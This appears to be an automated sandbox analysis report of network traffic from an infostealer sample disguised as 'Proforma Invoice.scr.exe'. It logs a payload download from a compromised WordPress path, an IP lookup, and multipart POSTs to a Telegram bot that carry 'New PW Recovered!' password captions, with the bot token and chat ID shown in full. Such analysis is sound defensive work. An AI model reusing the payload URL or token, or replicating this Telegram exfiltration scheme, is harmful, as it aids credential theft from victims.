                                                                                        Oct 31, 2024 11:14:57.644893885 CET51775443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:57.687354088 CET44351775149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:58.002862930 CET51775443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:58.002909899 CET44351775149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:58.092099905 CET44351775149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:58.143085003 CET51775443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:58.249139071 CET44351775149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:58.251359940 CET51775443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:58.251421928 CET44351775149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:58.251497984 CET51775443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:58.299364090 CET51776443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:58.299427986 CET44351776149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:58.299510956 CET51776443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:58.299768925 CET51776443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:58.299786091 CET44351776149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:59.123327017 CET44351776149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:59.123414040 CET51776443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:59.124974012 CET51776443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:59.124985933 CET44351776149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:59.125231981 CET44351776149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:59.126713991 CET51776443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:59.167323112 CET44351776149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:59.471246958 CET51776443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:59.471273899 CET44351776149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:59.486495018 CET44351776149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:59.533663988 CET51776443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:59.744147062 CET44351776149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:59.744714975 CET51776443192.168.2.6149.154.167.220
                                                                                        Oct 31, 2024 11:14:59.744791031 CET44351776149.154.167.220192.168.2.6
                                                                                        Oct 31, 2024 11:14:59.744874001 CET51776443192.168.2.6149.154.167.220

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 31, 2024 11:14:05.679869890 CET6202653192.168.2.61.1.1.1
                                                                                        Oct 31, 2024 11:14:06.189265966 CET53620261.1.1.1192.168.2.6
                                                                                        Oct 31, 2024 11:14:25.869194031 CET5894953192.168.2.61.1.1.1
                                                                                        Oct 31, 2024 11:14:25.876281023 CET53589491.1.1.1192.168.2.6
                                                                                        Oct 31, 2024 11:14:33.011075974 CET5838653192.168.2.61.1.1.1
                                                                                        Oct 31, 2024 11:14:33.018141985 CET53583861.1.1.1192.168.2.6
                                                                                        Oct 31, 2024 11:14:49.134283066 CET5356062162.159.36.2192.168.2.6
                                                                                        Oct 31, 2024 11:14:50.215193033 CET53589071.1.1.1192.168.2.6
                                                                                        Oct 31, 2024 11:14:56.731761932 CET6392253192.168.2.61.1.1.1
                                                                                        Oct 31, 2024 11:14:56.739111900 CET53639221.1.1.1192.168.2.6

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 31, 2024 11:14:05.679869890 CET192.168.2.61.1.1.10x6e97Standard query (0)geocs.mxA (IP address)IN (0x0001)false
                                                                                        Oct 31, 2024 11:14:25.869194031 CET192.168.2.61.1.1.10xbf72Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                        Oct 31, 2024 11:14:33.011075974 CET192.168.2.61.1.1.10x49c6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                        Oct 31, 2024 11:14:56.731761932 CET192.168.2.61.1.1.10x9578Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 31, 2024 11:13:59.323019981 CET1.1.1.1192.168.2.60x255eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 31, 2024 11:13:59.323019981 CET1.1.1.1192.168.2.60x255eNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Oct 31, 2024 11:13:59.323019981 CET1.1.1.1192.168.2.60x255eNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                        Oct 31, 2024 11:14:06.189265966 CET1.1.1.1192.168.2.60x6e97No error (0)geocs.mx173.237.185.182A (IP address)IN (0x0001)false
                                                                                        Oct 31, 2024 11:14:25.876281023 CET1.1.1.1192.168.2.60xbf72No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                        Oct 31, 2024 11:14:25.876281023 CET1.1.1.1192.168.2.60xbf72No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                        Oct 31, 2024 11:14:25.876281023 CET1.1.1.1192.168.2.60xbf72No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                        Oct 31, 2024 11:14:33.018141985 CET1.1.1.1192.168.2.60x49c6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                        Oct 31, 2024 11:14:56.739111900 CET1.1.1.1192.168.2.60x9578No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • geocs.mx
                                                                                        • api.ipify.org
                                                                                        • api.telegram.org

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.649737173.237.185.1824434000C:\Users\user\Desktop\Proforma Invoice.scr.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-31 10:14:07 UTC80OUTGET /wp-includes/Hjewct.vdf HTTP/1.1
                                                                                        Host: geocs.mx
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-31 10:14:08 UTC183INHTTP/1.1 200 OK
                                                                                        Date: Thu, 31 Oct 2024 10:14:14 GMT
                                                                                        Server: Apache
                                                                                        Last-Modified: Tue, 29 Oct 2024 16:15:46 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 993808
                                                                                        Connection: close
                                                                                        2024-10-31 10:14:08 UTC8009INData Raw: 59 bb 59 98 8d d4 55 48 67 9b 07 a4 9a 0d d0 0d 3d d7 99 85 ff a3 70 3c ba 9f 1e 89 cc 9c 62 8e 1c 97 e3 0b 75 14 48 11 7f ea 8b 97 3d 0f c3 88 2f d8 6a 05 59 1f a2 e0 d9 e9 32 25 a6 e6 ef 87 3b 59 70 8b b6 70 d9 78 4e ae 79 bc 01 57 4c 80 94 78 47 3c c7 34 02 a3 2c 07 f4 57 8e 1d 74 c2 5d d3 be 60 1f 42 e4 ca e0 93 68 6c 35 92 40 2f 8f 84 ef 6d 82 6c 90 e4 9f 3c 10 50 b9 8d a5 29 aa b5 43 56 36 53 50 a2 63 12 7e 59 a1 be 7a 9e 2c b5 d3 39 6f 23 f5 81 25 53 30 23 97 d1 f5 6d d0 da e5 7d b3 b0 d2 0f 53 87 71 34 8e 27 60 21 a1 3f 88 b8 9f 06 e2 1d 64 0c 74 3d ee 0a 41 cb b5 c7 99 24 25 4e 70 3a dc 7c ba 13 e5 52 d4 d8 26 db f9 de cb ef 77 ee 62 5c 9e 47 d2 2d 97 bb 0e 7d d7 8e 76 16 5a 54 57 d9 7d 06 77 24 cd b8 f3 58 44 b2 f3 de 00 ef a5 31 98 bc 45 6a 00
                                                                                        Data Ascii: YYUHg=p<buH=/jY2%;YppxNyWLxG<4,Wt]`Bhl5@/ml<P)CV6SPc~Yz,9o#%S0#m}Sq4'`!?dt=A$%Np:|R&wb\G-}vZTW}w$XD1Ej
                                                                                        2024-10-31 10:14:08 UTC8000INData Raw: 01 02 e7 a5 2c 6d 09 b0 1d cd 54 5c 0e 03 44 55 72 71 57 9f 5b fd b3 2a 88 54 8e e9 9d 4c a9 3c 01 68 89 45 64 ff 17 c8 9d 47 30 41 75 35 3b 55 48 35 a6 e1 4f c6 1b 25 a9 94 cc ae 65 47 b4 8e 57 68 f8 38 d0 a8 e2 66 b0 98 33 66 ab 90 e3 e1 b2 94 0c 71 9a 41 17 21 f0 d5 9c ef 50 b3 32 1e 91 f3 68 b4 dd 49 bc e2 b3 58 6b 8c ea 10 45 3c 62 7c 3c 43 7d ee bf 91 0a 3e 1d f9 a5 7a 7e 7d cd 6f 85 b9 ba 00 44 76 50 d4 cf 9d 44 d0 8d e3 58 d4 64 df 27 fa cf fd 66 bc ac 13 c6 6f 36 4b 28 30 eb 60 57 7a 7e 37 60 4e b3 2e f2 76 8a 14 61 63 50 23 7a ed 4a ad 6b 2f 2c 19 5f 47 a5 4e 1b e8 02 89 7f 86 4a ab 92 91 90 05 0d 27 12 b3 b5 bf 1d 93 a6 4a 0f 0b 84 07 5e 41 cd bd c5 2f d9 65 d8 9e b1 f7 ce 68 1b ae 64 91 98 20 20 31 6c 45 5b 16 89 21 39 7e f2 9f c0 eb 9e 21 30
                                                                                        Data Ascii: ,mT\DUrqW[*TL<hEdG0Au5;UH5O%eGWh8f3fqA!P2hIXkE<b|<C}>z~}oDvPDXd'fo6K(0`Wz~7`N.vacP#zJk/,_GNJ'J^A/ehd 1lE[!9~!0
                                                                                        2024-10-31 10:14:08 UTC8000INData Raw: e2 e9 53 fc de 7c 50 50 38 fc 2c 51 fb db 76 40 e1 ce 7e 7e b2 8d df 60 76 81 e3 1e a4 10 ed 88 e3 3e a3 4b 27 30 20 d4 10 44 b5 f6 ee 0a ad 79 e8 82 be 25 b7 96 b1 a8 1c a9 4e 1a f1 98 a9 8c a4 76 08 70 84 55 82 c0 74 40 53 2d 43 53 72 fb 45 ac 46 a7 02 73 71 10 be 43 73 3c 53 a8 ef f9 37 dc f0 75 3a 9d 59 40 50 11 73 b5 d8 50 08 fb f3 d5 14 03 27 95 ba 04 12 5f 34 d0 7b 84 19 44 55 a4 12 23 d1 34 b1 51 e7 65 a7 c2 8c e3 0d 0a 0a b3 2f 40 c4 c3 ff 31 b7 09 fa 2f 9e ed 32 05 db 82 4e 79 35 2e 2c 47 91 65 a6 8d 9c 27 4c 12 40 1a bd ea ff eb 47 70 f0 a7 2a 40 fd f0 8b 97 c7 a1 21 9d 9c 8f cd a7 40 25 f0 2f ee 39 4f 4f e9 e4 30 66 01 b0 d0 ac fc 0c cb 44 29 20 40 a2 92 ca 7d 3c 16 ad 6e 76 52 23 ce 92 30 2d 7a cb a9 21 f8 b0 54 26 c5 f1 d4 0d 21 2e f3 47 31
                                                                                        Data Ascii: S|PP8,Qv@~~`v>K'0 Dy%NvpUt@S-CSrEFsqCs<S7u:Y@PsP'_4{DU#4Qe/@1/2Ny5.,Ge'L@Gp*@!@%/9OO0fD) @}<nvR#0-z!T&!.G1
                                                                                        2024-10-31 10:14:08 UTC8000INData Raw: 0b 80 a0 b1 ad 67 45 43 81 62 83 11 15 27 5e f9 e9 5b dd 29 15 aa ec dc 36 5b 8d 3e 84 12 66 9c 64 82 48 a6 24 1c b1 e0 bc a1 65 0f 01 dc b5 17 ec 04 bf 81 35 21 f4 19 ba 33 5f ee 58 4e 0f ef 6e d3 72 95 c8 1d 31 f8 28 b3 99 d7 f8 03 4f 1f 2a f1 ec 12 5b 48 19 47 36 70 64 b1 53 87 ff fa 93 fb 98 7b 1b 42 e0 c2 28 7f 35 7d bb 4a 25 f7 d3 36 22 a0 d5 67 ed a1 9e bf 09 59 77 fd ec db 5c 72 e0 06 8f 2f d1 61 70 2d c0 4d b5 a5 a6 52 d5 1b f3 47 4f d7 32 98 1a 36 cd e7 d1 34 f9 9e d0 e4 2c c8 31 b5 b1 72 f8 1a 1b af 41 d6 4e e4 74 d1 f4 5b e2 4a cd af fb 85 0f 44 a6 23 67 f1 9f 9d 5a 34 b6 0a 1a 48 d1 7a a6 c9 85 a4 c2 9e a2 74 56 07 f8 5d 80 53 0e f5 8d 2b 37 b9 16 b2 58 58 11 fa b0 3e 30 ef b1 f6 82 80 cc cf 42 1c 15 01 e3 f6 6a 49 b4 33 08 9e 9b 80 c8 fe cf
                                                                                        Data Ascii: gECb'^[)6[>fdH$e5!3_XNnr1(O*[HG6pdS{B(5}J%6"gYw\r/ap-MRGO264,1rANt[JD#gZ4HztV]S+7XX>0BjI3
                                                                                        2024-10-31 10:14:08 UTC8000INData Raw: 31 84 60 23 6b 85 68 83 b6 ea 32 0d e3 00 4e e7 ca 7b 67 04 ba 83 0f 51 62 8f ee 83 ec 23 32 f1 c7 c7 52 32 ab 7d 02 24 a4 d0 e8 ef e5 5c ad 14 30 23 32 b9 cd d9 8e 37 6b a1 39 6a ce fc e6 d2 8a 92 68 66 c6 59 d1 f2 1e b5 43 7c 24 2a 51 55 36 35 d6 e2 51 fa 3c 1d 7e f3 d3 6b 97 fb 91 e1 8d e8 51 fb de 22 43 97 b0 7c a4 02 a6 7b 17 92 0f d1 87 dc 98 a7 9e 43 d0 cf 48 8d 9e f9 70 74 f7 ac 1a 73 5c 90 15 eb 67 84 ed 47 8f 6d c5 4b cd 64 81 41 2a 3a ce 0a bd fd bc ad b0 55 24 78 83 fe 31 96 b8 c2 0a a9 66 a8 15 6e 72 3f d1 5f 04 3c 66 7b 4f 54 58 a9 49 47 63 83 ac cd 0c 7d a5 c0 1c a8 02 44 c6 72 1e 7b 08 f9 c3 74 ea 10 26 6a 02 3b cc bd 35 45 89 16 15 5f 43 9d de 14 2f a9 ee 81 a8 8f 89 da 91 ab 0b 58 d5 e2 02 0a 75 8c fc 27 ec 57 f7 3c 25 2b 36 16 d0 f1 3b
                                                                                        Data Ascii: 1`#kh2N{gQb#2R2}$\0#27k9jhfYC|$*QU65Q<~kQ"C|{CHpts\gGmKdA*:U$x1fnr?_<f{OTXIGc}Dr{t&j;5E_C/Xu'W<%+6;
                                                                                        2024-10-31 10:14:08 UTC8000INData Raw: 71 7a a2 5f 86 b3 66 30 48 15 e4 74 2a 44 8c 72 d9 d6 3e ea c9 48 54 4b 8e bb 7a a2 cd ec 5f ac 0a 60 84 10 5e 38 2e 13 40 5e ff 01 e4 7b 19 a6 56 ac 72 fa 71 04 3d 5e b4 eb 4f c1 52 a9 13 dc 35 b5 ed 3f 68 93 3f 52 1f e3 af ae 52 aa 32 fe d4 eb 23 44 f5 5e 92 b4 ce ad 73 1f dc 9f 8f 34 90 70 0d 92 24 37 3a fb 47 50 3d 71 25 0b 10 e9 f5 fc 99 6c 91 97 fb 41 e9 4b e8 86 f1 0d 94 9c da ba 64 e0 75 32 7f 35 a7 62 4a f0 e0 63 74 6f 5d 19 e2 24 a0 4b 37 da b3 17 49 a4 c8 95 33 35 30 3d df f7 5a d4 7b 66 96 38 59 a6 59 1a ca db 69 54 a8 b9 af 35 20 cd 76 4d 1d 2c 19 9b ff 4c f4 29 e9 86 3f 3e 35 ec 65 60 4e b6 49 ea e4 ac 16 62 df d1 f2 04 02 25 fc ff 9a d2 cf 08 e6 da 2f b0 1c 43 ce 67 bc 07 5d f7 ae 91 a0 09 d3 bc 63 3c 87 13 01 2d 2e 29 8b b1 4f e0 d0 75 68
                                                                                        Data Ascii: qz_f0Ht*Dr>HTKz_`^8.@^{Vrq=^OR5?h?RR2#D^s4p$7:GP=q%lAKdu25bJcto]$K7I350=Z{f8YYiT5 vM,L)?>5e`NIb%/Cg]c<-.)Ouh
                                                                                        2024-10-31 10:14:08 UTC8000INData Raw: 6a ac 42 36 6f 79 0d 93 6d 09 6e ba 3c e6 2a ef b1 9e b0 25 7c 4b 8f a2 f2 3c 6c 2e 62 28 21 ac c3 2d 5d 5c e2 16 23 6d 1b 10 08 5c 03 51 39 01 51 f9 d0 a8 2a 8b d2 18 f8 38 bd d1 7a da 25 6a e8 fa c6 75 a3 12 71 a9 9f 66 c8 51 b0 0d 43 0f 89 8a 94 c4 60 30 53 f1 d9 5e ed 15 02 25 d3 79 97 6b ad bf 93 51 6b 6e 9b a9 34 3d c4 df 43 38 fe 5b 8f 78 4f e5 9e d9 29 29 9a 9f 85 61 94 2a 05 be 12 4f 33 0d ef 3f ba 29 5e 81 af 5e 13 c2 ee 95 82 8e 9b fb bd 23 42 d7 2b 57 a8 05 d8 65 d4 81 46 05 37 01 60 b9 86 f6 fa ed 90 80 3f 80 01 36 4c c4 6d fb 2e 45 e0 6d f2 2b 49 c7 72 1a 4a 25 a8 04 ca f0 d5 d5 f8 25 ef ab 99 cd e2 39 c6 5e 0b 6e ec df d0 25 3e b3 a2 a5 1e 59 2a d8 17 ff 7c 15 d9 8b 66 30 18 77 ed 05 8d cf 02 6f 87 bd d6 4f bb 64 a1 81 56 6d 92 08 c6 d7 d5
                                                                                        Data Ascii: jB6oymn<*%|K<l.b(!-]\#m\Q9Q*8z%juqfQC`0S^%ykQkn4=C8[xO))a*O3?)^^#B+WeF7`?6Lm.Em+IrJ%%9^n%>Y*|f0woOdVm
                                                                                        2024-10-31 10:14:08 UTC8000INData Raw: 58 0b 75 38 13 e9 fd 66 20 8a dd 63 aa ea 4d 45 ec dd 82 1e 90 ba 1a 10 68 a3 7f 6a 37 7c 2e 04 f4 56 80 1e 3a 0d 3e d7 4d 1a 97 7c b6 46 a1 d2 a1 bb a6 06 67 ff b8 eb a3 92 4f 52 97 7e 71 be d4 72 28 19 89 93 e9 a0 de 03 5e d0 31 06 bd 4c 25 0c 3a da 9c 64 9b 1e 5f ca 21 58 6e 16 b9 4a 2b bf 22 13 ca 24 fe 9b cf c8 70 01 7c 39 be c6 4a 5e f7 ae 8f e4 59 7b 22 fc 61 bd 19 ad 0a 59 ae 3b 5f 72 2e bf ba f5 8c 46 d3 24 3c 4c 28 76 df bf 61 75 ae a6 ad 15 24 b5 8a 18 a1 7e f1 ff eb 0f 12 14 4c 46 a1 98 99 3d ef 96 bf ea 35 62 05 9f 2f bb 26 2e 5f 32 86 34 64 e8 48 a1 6d e2 43 0a da f2 1b e3 81 7f 2d 48 e0 77 61 b6 26 aa 63 58 5c 43 58 a9 68 22 87 ae 8e 45 17 49 b2 fd 94 ee 02 ed 38 d3 c7 07 f9 b6 46 39 b1 91 75 21 49 22 8f a9 f6 fb b5 11 55 b7 0f 99 cc 70 a2
                                                                                        Data Ascii: Xu8f cMEhj7|.V:>M|FgOR~qr(^1L%:d_!XnJ+"$p|9J^Y{"aY;_r.F$<L(vau$~LF=5b/&._24dHmC-Hwa&cX\CXh"EI8F9u!I"Up
                                                                                        2024-10-31 10:14:08 UTC8000INData Raw: 67 4e a2 0d 91 aa 1e 2f 29 ef 2f d4 fd 61 26 05 b2 7f 52 7f 86 5a 80 fa b2 7c 7a 5c ab cb a2 7f 90 07 18 02 49 00 e7 da b2 b4 a4 99 85 9a e1 25 df b1 67 5c f3 a5 76 0f 19 7d 6c 4c 71 9d e2 79 aa dd b9 f2 83 75 9d 8e c4 98 c4 0b 97 c9 68 64 47 73 8e 87 43 be 55 1d f4 a5 0d 81 a5 a0 d5 06 3d 7d ea 08 16 e0 9e 21 64 cb 67 df cc 72 f5 f4 2b 97 c8 19 21 a0 94 b9 82 8d 3e 55 97 c2 09 4a f8 b0 8a 2f 2a 30 68 2d 94 59 f9 fe d1 c3 94 4d 7a 1a 5d dc 01 a7 87 b3 ce 34 af 9f a0 74 34 37 4f 1c 11 e3 1e 9e 11 60 c9 43 9b 97 d7 a8 e9 7a bb e6 ce 8e 36 c6 ff c0 d1 8c 35 9a e6 06 21 25 6b 72 6e cd bd 97 c6 eb df 50 a3 5c f4 34 d8 00 54 06 22 60 33 23 2c 15 55 81 1d b4 e9 fe 17 c5 db 2e 19 9d f4 d7 06 6a ea 51 21 73 59 58 61 ab fd 95 f9 9a f2 49 15 23 e4 dd 93 2d 71 2f b6
                                                                                        Data Ascii: gN/)/a&RZ|z\I%g\v}lLqyuhdGsCU=}!dgr+!>UJ/*0h-YMz]4t47O`Cz65!%krnP\4T"`3#,U.jQ!sYXaI#-q/
                                                                                        2024-10-31 10:14:08 UTC8000INData Raw: 96 0d f3 44 09 89 1e 52 9f 12 52 1c 54 4f a5 3f db 88 c0 e6 93 fb 3e 26 95 39 98 bc e2 70 f8 42 14 16 e3 ac e8 82 ea 51 3a 12 ee 28 ba eb dd ca 11 42 55 31 33 c9 40 28 d5 9c 2e 44 0f 07 ec c9 9d 25 07 4c a3 63 33 1a d9 51 56 dd a6 ca 26 db 22 1d 49 f5 aa 16 53 a6 17 84 53 7f 0d e7 94 05 a7 a3 3e 61 19 d6 6c e4 3f 2f 0e 8d fe 95 22 1b 1f 3c 2e 1b b4 d2 1d 0f 75 62 1e 6b f7 33 c4 9f b7 5f f9 c1 26 ee ee e3 6c 32 0d f5 0c 2d db 09 1a ae 4f 86 bc d7 1a 9e 24 7b 7d ad 41 24 4b 99 77 87 25 dc 09 0c 15 90 e4 00 14 09 9c b8 f4 52 69 8d 72 2d 39 8e aa 65 cd 2d d7 54 8d 43 ea e3 b8 1f 76 cb 60 12 30 45 65 ae 01 51 2b e1 d0 0b c7 b6 df 36 d6 f7 f9 e1 34 c1 e5 92 f2 46 f7 27 ae 05 bf e6 5e a0 f5 d6 8a 75 d0 d9 b6 1f c2 e0 ab 91 5a 02 7b b4 fa 10 95 07 d5 41 48 23 c8
                                                                                        Data Ascii: DRRTO?>&9pBQ:(BU13@(.D%Lc3QV&"ISS>al?/"<.ubk3_&l2-O${}A$Kw%Rir-9e-TCv`0EeQ+64F'^uZ{AH#


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.649841104.26.13.2054433412C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-31 10:14:26 UTC155OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                        Host: api.ipify.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-31 10:14:26 UTC211INHTTP/1.1 200 OK
                                                                                        Date: Thu, 31 Oct 2024 10:14:26 GMT
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 14
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8db2e0d06d6445f6-DFW
                                                                                        2024-10-31 10:14:26 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37
                                                                                        Data Ascii: 173.254.250.77


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.649879149.154.167.2204433412C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-31 10:14:33 UTC260OUTPOST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8dcf97349026ea0
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 981
                                                                                        Expect: 100-continue
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-31 10:14:34 UTC25INHTTP/1.1 100 Continue
                                                                                        2024-10-31 10:14:34 UTC981OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 37 33 34 39 30 32 36 65 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 38 38 32 39 33 39 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 37 33 34 39 30 32 36 65 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 33 31 2f 32 30 32 34 20 30 36 3a 31 34 3a 33 31 0a 55 73 65 72
                                                                                        Data Ascii: -----------------------------8dcf97349026ea0Content-Disposition: form-data; name="chat_id"7068829394-----------------------------8dcf97349026ea0Content-Disposition: form-data; name="caption"New PW Recovered!Time: 10/31/2024 06:14:31User
                                                                                        2024-10-31 10:14:34 UTC402INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Thu, 31 Oct 2024 10:14:34 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 56
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.649890149.154.167.2204433412C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-31 10:14:36 UTC236OUTPOST /bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8dcf98afee4d99a
                                                                                        Host: api.telegram.org
                                                                                        Content-Length: 918
                                                                                        Expect: 100-continue
                                                                                        2024-10-31 10:14:36 UTC25INHTTP/1.1 100 Continue
                                                                                        2024-10-31 10:14:36 UTC918OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 38 61 66 65 65 34 64 39 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 38 38 32 39 33 39 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 38 61 66 65 65 34 64 39 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 4f 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 30 2f 33 31 2f 32 30 32 34 20 30 39 3a 30 34 3a 31 35 0a 55 73 65 72
                                                                                        Data Ascii: -----------------------------8dcf98afee4d99aContent-Disposition: form-data; name="chat_id"7068829394-----------------------------8dcf98afee4d99aContent-Disposition: form-data; name="caption"New CO Recovered!Time: 10/31/2024 09:04:15User
                                                                                        2024-10-31 10:14:36 UTC402INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Thu, 31 Oct 2024 10:14:36 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 56
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.649910173.237.185.1824436828C:\Users\user\AppData\Roaming\EncoderFallback.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-31 10:14:39 UTC80OUTGET /wp-includes/Hjewct.vdf HTTP/1.1
                                                                                        Host: geocs.mx
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-31 10:14:39 UTC183INHTTP/1.1 200 OK
                                                                                        Date: Thu, 31 Oct 2024 10:14:45 GMT
                                                                                        Server: Apache
                                                                                        Last-Modified: Tue, 29 Oct 2024 16:15:46 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 993808
                                                                                        Connection: close
